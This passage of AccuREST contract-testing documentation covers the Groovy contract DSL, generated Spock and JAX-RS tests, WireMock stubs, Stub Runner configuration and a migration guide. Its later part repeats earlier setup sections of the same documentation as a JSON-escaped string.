                        server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')))
        )
        headers {
            header 'Content-Type': 'text/plain'
        }
    }
}
----

## Passing optional parameters

It is possible to provide optional parameters in your contract. Optional parameters are only possible for:

- the __STUB__ side of the request
- the __TEST__ side of the response

Example:

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    priority 1
    request {
        method 'POST'
        url '/users/password'
        headers {
            header 'Content-Type': 'application/json'
        }
        body(
                email: $(stub(optional(regex(email()))), test('abc@abc.com')),
                callback_url: $(stub(regex(hostname())), test('http://partners.com'))
        )
    }
    response {
        status 404
        headers {
            header 'Content-Type': 'application/json'
        }
        body(
                code: value(stub("123123"), test(optional("123123"))),
                message: "User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]"
        )
    }
}
----

By wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that matches the wrapped value zero or one time.

This way, for the example above, the following test would be generated:

[source,groovy,indent=0]
----
given:
    def request = given()
            .header('Content-Type', 'application/json')
            .body('{"email":"abc@abc.com","callback_url":"http://partners.com"}')

when:
    def response = given().spec(request)
            .post("/users/password")

then:
    response.statusCode == 404
    response.header('Content-Type') == 'application/json'
and:
    DocumentContext parsedJson = JsonPath.parse(response.body.asString())
    !parsedJson.read('''$[?(@.code =~ /(123123)?/)]''', JSONArray).empty
    !parsedJson.read('''$[?(@.message =~ /User not found by email = \\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\]/)]''', JSONArray).empty
----

and the following stub:

[source,javascript,indent=0]
----
{
  "request" : {
    "url" : "/users/password",
    "method" : "POST",
    "bodyPatterns" : [ {
      "matchesJsonPath" : "$[?(@.callback_url =~ /((http[s]?|ftp):\\/)\\/?([^:\\/\\s]+)(:[0-9]{1,5})?/)]"
    }, {
      "matchesJsonPath" : "$[?(@.email =~ /([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4})?/)]"
    } ],
    "headers" : {
      "Content-Type" : {
        "equalTo" : "application/json"
      }
    }
  },
  "response" : {
    "status" : 404,
    "body" : "{\"code\":\"123123\",\"message\":\"User not found by email = [not.existing@user.com]\"}",
    "headers" : {
      "Content-Type" : "application/json"
    }
  },
  "priority" : 1
}
----
## Executing custom methods on server side

It is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as `baseClassForTests` in the configuration. Please see the examples below:

### Groovy DSL

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        method 'PUT'
        url $(client(regex('^/api/[0-9]{2}$')), server('/api/12'))
        headers {
            header 'Content-Type': 'application/json'
        }
        body '''\
[{
    "text": "Gonna see you at Warsaw"
}]
'''
    }
    response {
        body(
                path: $(client('/api/12'), server(regex('^/api/[0-9]{2}$'))),
                correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))
        )
        status 200
    }
}
----

### Base Mock Spec

[source,groovy,indent=0]
----
abstract class BaseMockMvcSpec extends Specification {

    def setup() {
        RestAssuredMockMvc.standaloneSetup(new PairIdController())
    }

    void isProperCorrelationId(Integer correlationId) {
        assert correlationId == 123456
    }
}
----

## JAX-RS support

Starting with release 0.8.0 we support the JAX-RS 2 Client API. The base class needs to define `protected WebTarget webTarget` and the server initialization; right now the only way to test a JAX-RS API is to start a web server.

A request with a body needs to have a content type set, otherwise `application/octet-stream` will be used.

In order to use JAX-RS mode, use the following settings:

[source,groovy,indent=0]
----
testMode = 'JAXRSCLIENT'
----
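The generated JAX-RS tests reference a `webTarget` field, so the base class has to initialize it. Below is a minimal sketch, assuming the application under test has already been started on `localhost:8080` (the class name, port and startup mechanism are assumptions for the example):

[source,groovy,indent=0]
----
import javax.ws.rs.client.ClientBuilder
import javax.ws.rs.client.WebTarget

import spock.lang.Specification

abstract class JaxRsSpec extends Specification {

    // the generated tests expect a field with exactly this name and type
    protected WebTarget webTarget

    def setup() {
        // assumption: the tested server is already listening on this address
        webTarget = ClientBuilder.newClient().target('http://localhost:8080')
    }
}
----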
An example of a generated test:

[source,groovy,indent=0]
----
class FraudDetectionServiceSpec extends MvcSpec {

    def shouldMarkClientAsNotFraud() {
        when:
            def response = webTarget
                    .path('/fraudcheck')
                    .request()
                    .method('put', entity('{"clientPesel":"1234567890","loanAmount":123.123}', 'application/vnd.fraud.v1+json'))

            String responseAsString = response.readEntity(String)

        then:
            response.status == 200
            response.getHeaderString('Content-Type') == 'application/vnd.fraud.v1+json'
        and:
            def responseBody = new JsonSlurper().parseText(responseAsString)
            responseBody.fraudCheckStatus == "OK"
            assertThatRejectionReasonIsNull(responseBody.rejectionReason)
    }

    def shouldMarkClientAsFraud() {
        when:
            def response = webTarget
                    .path('/fraudcheck')
                    .request()
                    .method('put', entity('{"clientPesel":"1234567890","loanAmount":99999}', 'application/vnd.fraud.v1+json'))

            String responseAsString = response.readEntity(String)

        then:
            response.status == 200
            response.getHeaderString('Content-Type') == 'application/vnd.fraud.v1+json'
        and:
            def responseBody = new JsonSlurper().parseText(responseAsString)
            responseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')
            responseBody.rejectionReason == "Amount too high"
    }

}
----

# 4. Client Side

During the tests you want to have a WireMock instance up and running that simulates the service Y. You would like to feed that instance with proper stub definitions. Those stub definitions need to be valid from WireMock's perspective, but should also be reusable on the server side.

__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing, and you need exact values for responses.

# 5. Server Side

Since you, as service Y, are developing your own stub, you need to be sure that it actually resembles your concrete implementation. You can't have a situation where the stub acts one way and your application behaves a different way in production.

That's why acceptance tests are generated from the provided stub; they ensure that your application behaves in the same way as you define in your stub.

__Summing it up:__ On this side, in the stub definition, you need exact values for the request and can use patterns/methods for response verification.

# 6. Examples

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        method 'PUT'
        url '/api/12'
        headers {
            header 'Content-Type': 'application/vnd.com.ofg.twitter-places-analyzer.v1+json'
        }
        body '''\
[{
    "created_at": "Sat Jul 26 09:38:57 +0000 2014",
    "id": 492967299297845248,
    "id_str": "492967299297845248",
    "text": "Gonna see you at Warsaw",
    "place":
    {
        "attributes":{},
        "bounding_box":
        {
            "coordinates":
            [[
                [-77.119759,38.791645],
                [-76.909393,38.791645],
                [-76.909393,38.995548],
                [-77.119759,38.995548]
            ]],
            "type":"Polygon"
        },
        "country":"United States",
        "country_code":"US",
        "full_name":"Washington, DC",
        "id":"01fbe706f872cb32",
        "name":"Washington",
        "place_type":"city",
        "url": "http://api.twitter.com/1/geo/id/01fbe706f872cb32.json"
    }
}]
'''
    }
    response {
        status 200
    }
}
----

# 7. Scenarios

It's possible to handle scenarios with Accurest. All you need to do is to stick to a proper naming convention while creating your contracts. The convention requires contract file names to include an order number followed by an underscore.

[source,indent=0]
----
my_contracts_dir\
    scenario1\
        1_login.groovy
        2_showCart.groovy
        3_logout.groovy
----

Such a tree will cause Accurest to generate a WireMock scenario named `scenario1` with three steps:
 - login, marked as `Started`, pointing to:
 - showCart, marked as `Step1`, pointing to:
 - logout, marked as `Step2`, which will close the scenario.

More details about WireMock scenarios can be found at [http://wiremock.org/stateful-behaviour.html](http://wiremock.org/stateful-behaviour.html)

Accurest will also generate tests with a guaranteed order of execution.

# 8. Stub Runner

One of the issues that you could have encountered while using AccuREST was passing the generated WireMock JSON stubs from the server side to the client side (or to various clients). Copying the JSON files manually is out of the question.

In this article you'll see how to prepare your project to start publishing stubs as JARs, and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.

## Publishing stubs as JARs

The easiest approach would be to centralize the way stubs are kept.
For example, you can keep them as JARs in a Maven repository.

### Gradle

Example of an AccuREST Gradle setup:

[source,groovy,indent=0]
----
apply plugin: 'maven-publish'

ext {
    wiremockStubsOutputDir = file("${project.buildDir}/production/${project.name}-stubs/")
}

accurest {
    targetFramework = 'Spock'
    testMode = 'MockMvc'
    baseClassForTests = 'com.toomuchcoding.MvcSpec'
    contractsDslDir = file("${project.projectDir.absolutePath}/mappings/")
    generatedTestSourcesDir = file("${project.buildDir}/generated-sources/")
    stubsOutputDir = wiremockStubsOutputDir
}

task stubsJar(type: Jar, dependsOn: ["generateWireMockClientStubs"]) {
    baseName = "${project.name}-stubs"
    from wiremockStubsOutputDir
}

artifacts {
    archives stubsJar
}

publishing {
    publications {
        stubs(MavenPublication) {
            artifactId "${project.name}-stubs"
            artifact stubsJar
        }
    }
}
----

### Maven

A Maven example can be found in the [AccuREST Maven Plugin README](https://github.com/Codearte/accurest-maven-plugin/#publishing-wiremock-stubs-projectf-stubsjar)
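With the Gradle setup above, the stubs jar is published using the standard `maven-publish` tasks: `./gradlew publishToMavenLocal` for a quick local round trip, or, once a target repository is configured, `./gradlew publish`.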
## Using Stub Runner to automate running stubs

Stub Runner automates downloading stubs from a Maven repository (which includes the local Maven repository) and starting a WireMock server for each of those stubs.

### Modules

AccuREST comes with a new structure of modules:

[source,indent=0]
----
└── stub-runner
    ├── stub-runner
    ├── stub-runner-junit
    ├── stub-runner-spring
    └── stub-runner-spring-cloud
----

#### Stub Runner

Contains the core logic of Stub Runner. It gives you a main class to run Stub Runner from the command line or from Gradle.

Here is the list of options with which you can run Stub Runner:

[source,indent=0]
----
java -jar stub-runner.jar [options...]
 -maxp (--maxPort) N            : Maximum port value to be assigned to the
                                  Wiremock instance. Defaults to 15000
                                  (default: 15000)
 -minp (--minPort) N            : Minimal port value to be assigned to the
                                  Wiremock instance. Defaults to 10000
                                  (default: 10000)
 -s (--stubs) VAL               : Comma separated list of Ivy representation of
                                  jars with stubs. Eg. groupid:artifactid1,group
                                  id2:artifactid2:classifier
 -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you
                                  keep your stubs (e.g. http://nexus.net/content
                                  /repositories/repository)
 -ss (--stubsSuffix) VAL        : Suffix for the jar containing stubs (e.g.
                                  'stubs' if the stub jar would have a 'stubs'
                                  classifier for stubs: foobar-stubs ).
                                  Defaults to 'stubs' (default: stubs)
 -wo (--workOffline)            : Switch to work offline. Defaults to 'false'
                                  (default: false)
----

You can produce a fat jar and run the app as presented above. You can also configure Stub Runner from Gradle, either by passing the full argument list with `-Pargs`, like this:

`./gradlew stub-runner-root:stub-runner:run -Pargs="-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h"`

or by passing each parameter separately, with a `-P` prefix and without the hyphen (-) in the parameter name:

`./gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`

#### Stub Runner JUnit Rule

Stub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for a given group and artifact id:

[source,java,indent=0]
----
@ClassRule public static AccurestRule rule = new AccurestRule()
        .repoRoot("http://your.repo.com")
        .downloadStub("io.codearte.accurest.stubs", "loanIssuance")
        .downloadStub("io.codearte.accurest.stubs:fraudDetectionServer")
        .downloadStub("io.codearte:stub1", "io.codearte:stub2:classifier", "io.codearte:stub3");
----

After that rule gets executed, Stub Runner connects to your Maven repository and, for the given list of dependencies, tries to:

* download them
* cache them locally
* unzip them to a temporary folder
* start a WireMock server for each Maven dependency, on a random port from the provided range of ports
* feed the WireMock server with all JSON files that are valid WireMock definitions

Stub Runner uses the [Groovy's Grape](http://docs.groovy-lang.org/latest/html/documentation/grape.html) mechanism to download the Maven dependencies. Check the [docs](http://docs.groovy-lang.org/latest/html/documentation/grape.html) for more information.
Since `AccurestRule` implements `StubFinder`, it allows you to find the started stubs:

[source,groovy,indent=0]
----
interface StubFinder {
    /**
     * For the given groupId and artifactId tries to find the matching
     * URL of the running stub.
     *
     * @param groupId - might be null. In that case a search only via artifactId takes place
     * @return URL of a running stub or null if not found
     */
    URL findStubUrl(String groupId, String artifactId)

    /**
     * For the given Ivy notation {@code groupId:artifactId} tries to find the matching
     * URL of the running stub. You can also pass only {@code artifactId}.
     *
     * @param ivyNotation - Ivy representation of the Maven artifact
     * @return URL of a running stub or null if not found
     */
    URL findStubUrl(String ivyNotation)

    /**
     * Returns all running stubs
     */
    RunningStubs findAllRunningStubs()
}
----

Example of usage in Spock tests:

[source,groovy,indent=0]
----
@ClassRule @Shared AccurestRule rule = new AccurestRule()
        .repoRoot('http://your.repo.com')
        .downloadStub("io.codearte.accurest.stubs", "loanIssuance")
        .downloadStub("io.codearte.accurest.stubs:fraudDetectionServer")

def 'should start WireMock servers'() {
    expect: 'WireMocks are running'
        rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null
        rule.findStubUrl('loanIssuance') != null
        rule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')
        rule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null
    and:
        rule.findAllRunningStubs().isPresent('loanIssuance')
        rule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')
        rule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')
    and: 'Stubs were registered'
        "${rule.findStubUrl('loanIssuance').toString()}/name".toURL().text == 'loanIssuance'
        "${rule.findStubUrl('fraudDetectionServer').toString()}/name".toURL().text == 'fraudDetectionServer'
}
----

Example of usage in JUnit tests:

[source,java,indent=0]
----
@ClassRule public static AccurestRule rule = new AccurestRule()
        .repoRoot("http://your.repo.com")
        .downloadStub("io.codearte.accurest.stubs", "loanIssuance")
        .downloadStub("io.codearte.accurest.stubs:fraudDetectionServer");

@Test
public void should_start_wiremock_servers() throws Exception {
    // expect: 'WireMocks are running'
        then(rule.findStubUrl("io.codearte.accurest.stubs", "loanIssuance")).isNotNull();
        then(rule.findStubUrl("loanIssuance")).isNotNull();
        then(rule.findStubUrl("loanIssuance")).isEqualTo(rule.findStubUrl("io.codearte.accurest.stubs", "loanIssuance"));
        then(rule.findStubUrl("io.codearte.accurest.stubs:fraudDetectionServer")).isNotNull();
    // and:
        then(rule.findAllRunningStubs().isPresent("loanIssuance")).isTrue();
        then(rule.findAllRunningStubs().isPresent("io.codearte.accurest.stubs", "fraudDetectionServer")).isTrue();
        then(rule.findAllRunningStubs().isPresent("io.codearte.accurest.stubs:fraudDetectionServer")).isTrue();
    // and: 'Stubs were registered'
        then(httpGet(rule.findStubUrl("loanIssuance").toString() + "/name")).isEqualTo("loanIssuance");
        then(httpGet(rule.findStubUrl("fraudDetectionServer").toString() + "/name")).isEqualTo("fraudDetectionServer");
}
----

Check the *Common properties for JUnit and Spring* section for more information on how to apply global configuration to Stub Runner.

#### Stub Runner Spring

If you're using Spring, you can just import `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.

In order to find the URL and port of a given dependency, you can autowire the bean in your test and call its methods:
[source,groovy,indent=0]
----
@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)
class StubRunnerConfigurationSpec extends Specification {

    @Autowired StubFinder stubFinder

    def 'should start WireMock servers'() {
        expect: 'WireMocks are running'
            stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null
            stubFinder.findStubUrl('loanIssuance') != null
            stubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')
            stubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null
        and:
            stubFinder.findAllRunningStubs().isPresent('loanIssuance')
            stubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')
            stubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')
        and: 'Stubs were registered'
            "${stubFinder.findStubUrl('loanIssuance').toString()}/name".toURL().text == 'loanIssuance'
            "${stubFinder.findStubUrl('fraudDetectionServer').toString()}/name".toURL().text == 'fraudDetectionServer'
    }

    @Configuration
    @Import(StubRunnerConfiguration)
    @EnableAutoConfiguration
    static class Config {}
}
----

Check the *Common properties for JUnit and Spring* section for more information on how to apply global configuration to Stub Runner.

#### Stub Runner Spring Cloud

If you're using Spring Cloud, it's enough to add `stub-runner-spring-cloud` to the classpath; a bean of type `StubFinder` will get registered automatically.

#### Common properties for JUnit and Spring

Some of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:

[width="60%",frame="topbot",options="header"]
|======================
|Property name|Default value|Description
|stubrunner.port.range.min|10000|Minimal value of a port for a started WireMock with stubs
|stubrunner.port.range.max|15000|Maximal value of a port for a started WireMock with stubs
|stubrunner.stubs.repository.root||Maven repo URL. If blank, the local Maven repository is used
|stubrunner.stubs.classifier|stubs|Default classifier for the stub artifacts
|stubrunner.work-offline|false|If true, no remote repositories will be contacted to download stubs
|stubrunner.stubs||Comma-separated list of Ivy notations of stubs to download
|======================
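For example, in a Gradle build these could be passed to the test JVM like this (the values below are placeholders):

[source,groovy,indent=0]
----
test {
    // pass Stub Runner configuration as system properties to the tests
    systemProperty 'stubrunner.stubs.repository.root', 'http://your.repo.com'
    systemProperty 'stubrunner.stubs', 'io.codearte.accurest.stubs:loanIssuance'
    systemProperty 'stubrunner.work-offline', 'false'
}
----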
# 9. Migration Guide

## Migration to 0.4.7

- in 0.4.7 we fixed the package name (coderate to codearte), so you have to do the same in your projects. This means replacing `io.coderate.accurest.dsl.GroovyDsl` with `io.codearte.accurest.dsl.GroovyDsl`

## Migration to 1.0.0-RC1

- from 1.0.0 we distinguish ignored contracts from excluded contracts:
 - the `excludedFiles` pattern tells Accurest to skip processing those files at all
 - the `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`
- from 1.0.0 the `basePackageForTests` behaviour has changed:
 - prior to the change, all DSL files had to be under `contractsDslDir`/`basePackageForTests`/*subpackage*, resulting in the `basePackageForTests`.*subpackage* test package
 - now all DSL files have to be under `contractsDslDir`/*subpackage*, resulting in the `basePackageForTests`.*subpackage* test package
 - if you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*
Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. 
By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. 
Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. 
In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. 
Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : 